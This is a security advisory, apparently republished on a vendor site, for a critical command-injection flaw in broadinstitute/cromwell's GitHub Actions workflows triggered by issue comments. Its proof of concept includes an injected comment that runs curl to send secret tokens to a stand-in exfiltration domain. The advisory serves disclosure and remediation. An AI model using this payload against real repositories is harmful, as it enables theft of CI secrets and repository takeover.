Summary
Using Issue_comment on .github/workflows/scalafmt-fix.yml an attacker can inject malicious code using github.event.comment.body. By exploiting the vulnerability, it is possible to exfiltrate high privileged GITHUB_TOKEN which can be used to completely overtake the repo since the token has content privileges. In addition ,it is possible to exfiltrate also the secret:
BROADBOT_GITHUB_TOKEN
Details
The Issue_comment in GitHub Actions might be an injection path if the variable isn't handle as it should. In the following step it's vulnerable because it directly interpolates untrusted user input into a shell script.
- name: Check for ScalaFmt Comment
id: check-comment
run: |
if [[ "${{ github.event_name }}" == "issue_comment" && "${{ github.event.comment.body }}" == *"scalafmt"* ]]; then
echo "::set-output name=comment-triggered::true"
else
echo "::set-output name=comment-triggered::false"
fi
In this case, it is possible to exfiltrate GITHUB_TOKEN and BROADBOT_GITHUB_TOKEN secrets.
PoC
To exploit the vulnerability an attacker can just drop a comment to any issue formed in the following way to exploit the vulnerability in the workflow .github/workflows/update_pylon_issue.yml.
test" == "test" ]]; then
& curl -s -d "$B64_BLOB" "https://$YOUR_EXFIL_DOMAIN/token" > /dev/null #
To prove this is possible, we created an issue and we added a comment with the malicious code to extract the GITHUB_TOKEN and BROADBOT_GITHUB_TOKEN secret. With the GITHUB_TOKEN extracted we were able to push a new poc tag which has been deleted after a couple of minutes.
Impact
Usually with GITHUB_TOKEN and write permissions, an attacker is able to completely overtake the repo.
GITHUB_TOKEN Permissions
Actions: write
Attestations: write
Checks: write
Contents: write
Deployments: write
Discussions: write
Issues: write
Metadata: read
Models: read
Packages: write
Pages: write
PullRequests: write
RepositoryProjects: write
SecurityEvents: write
Statuses: write
We also checked BROADBOT_GITHUB_TOKEN permission to check if we could move laterally to org level. In this case the token seems scoped to this specific repo but it gives an attacker persistence without the need of a valid GITHUB_TOKEN.
We suggest to rotate the BROADBOT_GITHUB_TOKEN token asap.
Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.
GHSA-PHF6-HM3H-X8QP has a CVSS score of 9.1 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (90); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
- Avoid directly interpolating untrusted user input into a shell script. Use GitHub Actions input context safely like:
- name: Dump comment
run: echo "Comment Body: $BODY"
env:
BODY: ${{ github.event.comment.body }}
This safely passes the comment as an environment variable rather than interpolating it in-place.
- Scope GIHTUB_TOKEN permissions to just what the actions needs to do. In this case, if it's specific for issues:
permissions:
issues: write
Kindly reported by @darryk10 @AlbertoPellitteri @loresuso
Frequently Asked Questions
- What is GHSA-PHF6-HM3H-X8QP? GHSA-PHF6-HM3H-X8QP is a critical-severity OS command injection vulnerability in broadinstitute/cromwell (actions), affecting versions >= 87, < 90. It is fixed in 90. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
- How severe is GHSA-PHF6-HM3H-X8QP? GHSA-PHF6-HM3H-X8QP has a CVSS score of 9.1 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of broadinstitute/cromwell are affected by GHSA-PHF6-HM3H-X8QP? broadinstitute/cromwell (actions) versions >= 87, < 90 is affected.
- Is there a fix for GHSA-PHF6-HM3H-X8QP? Yes. GHSA-PHF6-HM3H-X8QP is fixed in 90. Upgrade to this version or later.
- Is GHSA-PHF6-HM3H-X8QP exploitable, and should I be worried? Whether GHSA-PHF6-HM3H-X8QP is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether GHSA-PHF6-HM3H-X8QP is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-PHF6-HM3H-X8QP? Upgrade
broadinstitute/cromwellto 90 or later.